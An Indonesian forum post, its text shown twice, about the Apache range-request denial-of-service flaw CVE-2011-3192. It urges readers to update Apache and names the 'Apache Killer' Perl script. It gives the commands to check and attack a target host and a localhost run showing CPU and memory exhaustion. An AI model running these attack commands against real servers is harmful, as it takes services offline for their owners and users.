09-02-2011, 05:12 PM
sekedar info (mungkin sudah banyak yg tahu) kalau terdapat vulnerability pada Apache HTTP Server 1.3.x dan 2.x.x hingga 2.2.19.
klo di database mitre.org nama vulnerabilitynya adalah CVE-2011-3192
vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.
vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.
berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:
cara penggunaannya adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak
2. untuk melakukan eksploitasi
ini yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:
hasilnya:
lihat pada Cpu(s): 92.5%us dan Mem: 3094072k total, 2748296k used, 345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya
processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service...
jadi segera update Apache server anda
semoga bermanfaat
M
Sumber:
waduh postingannya kok lebar amat wkwkwk
gmn nih cara benerinnya? maaf klo keliatan kurang rapi...
klo di database mitre.org nama vulnerabilitynya adalah CVE-2011-3192
vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.
vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.
berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:
Spoiler! :
cara penggunaannya adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak
Code:
perl filename.pl www.target.com
2. untuk melakukan eksploitasi
Code:
perl filename.pl YES www.target.com
ini yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:
Quote:root@bt:~/Programs# perl apache_killer.pl YES localhost
Testing for partial content exploit against localhost/...
Host: localhost appears to be vulnerable to partial content DoS
Running partial content exploit against localhost/ using 50 threads
...........................................................................................
hasilnya:
Quote:root@bt:/pentest/web/nikto# top
top - 15:59:53 up 3:43, 6 users, load average: 16.15, 3.84, 1.55
Tasks: 188 total, 54 running, 134 sleeping, 0 stopped, 0 zombie
Cpu(s): 92.5%us, 6.8%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Mem: 3094072k total, 2748296k used, 345776k free, 59780k buffers
Swap: 1952764k total, 0k used, 1952764k free, 537448k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1753 root 20 0 1067m 787m 35m R 32 26.1 56:34.54 firefox-bin
1572 root 20 0 275m 71m 32m R 12 2.4 26:46.66 kwin
1433 root 19 -1 68768 53m 10m S 11 1.8 18:27.57 Xorg
1786 root 20 0 101m 21m 15m S 4 0.7 3:10.73 konsole
4329 www-data 20 0 49808 19m 1160 S 4 0.7 0:00.66 apache2
4328 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.61 apache2
3535 www-data 20 0 49808 19m 1160 R 3 0.7 0:04.61 apache2
3975 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.56 apache2
3981 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.50 apache2
4012 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.45 apache2
4333 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.54 apache2
4351 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.44 apache2
4364 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4387 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4020 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.41 apache2
4377 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.42 apache2
3494 www-data 20 0 49808 19m 1160 R 2 0.7 0:04.78 apache2
4026 www-data 20 0 49808 19m 1160 R 2 0.7 0:01.35 apache2
4325 www-data 20 0 49808 19m 1160 S 2 0.7 0:00.84 apache2
lihat pada Cpu(s): 92.5%us dan Mem: 3094072k total, 2748296k used, 345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya
processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service...
jadi segera update Apache server anda
semoga bermanfaat
M
Sumber:
Spoiler! :
waduh postingannya kok lebar amat wkwkwk
gmn nih cara benerinnya? maaf klo keliatan kurang rapi...
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
Personal blog: http://ikonspirasi.net